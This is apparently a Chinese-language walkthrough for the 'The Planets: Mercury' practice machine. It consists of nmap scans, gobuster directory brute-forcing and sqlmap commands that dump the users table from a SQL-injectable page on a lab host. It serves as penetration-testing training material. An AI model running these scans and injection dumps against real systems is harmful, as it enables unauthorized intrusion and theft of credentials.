靶机精讲 之 THE PLANETS MERCURY
# C段
sudo nmap -sn 192.168.28.0/24
# 端口扫描
sudo nmap -sT --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/ports
# 详细信息扫描
sudo nmap -sT -sV -sC -O -p22,8080 192.168.28.32 -oA nmapscan/detail
# UDP
sudo nmap -sU --min-rate 10000 -p- 192.168.28.32 -oA nmapscan/udp
sudo nmap -sU --top-ports 20 192.168.28.32 -oA nmapscan/udp
# 漏洞扫描
sudo nmap --script=vuln -p22,8080 192.168.28.32
端口扫描
详细信息扫描
UDP扫描
漏洞脚本扫描
目录爆破
sudo gobuster dir -u http://192.168.28.32:8080 -w /usr/share/dirbuster/wordlist/directory-list-2.3-medium.txt
SQL注入
-
sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql --dbs
-
sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql -D mercury -tables --batch
-
sudo sqlmap -u http://192.168.28.32:8080/mercuryfacts/1 --dbms mysql -D mercury -T users --dump --batch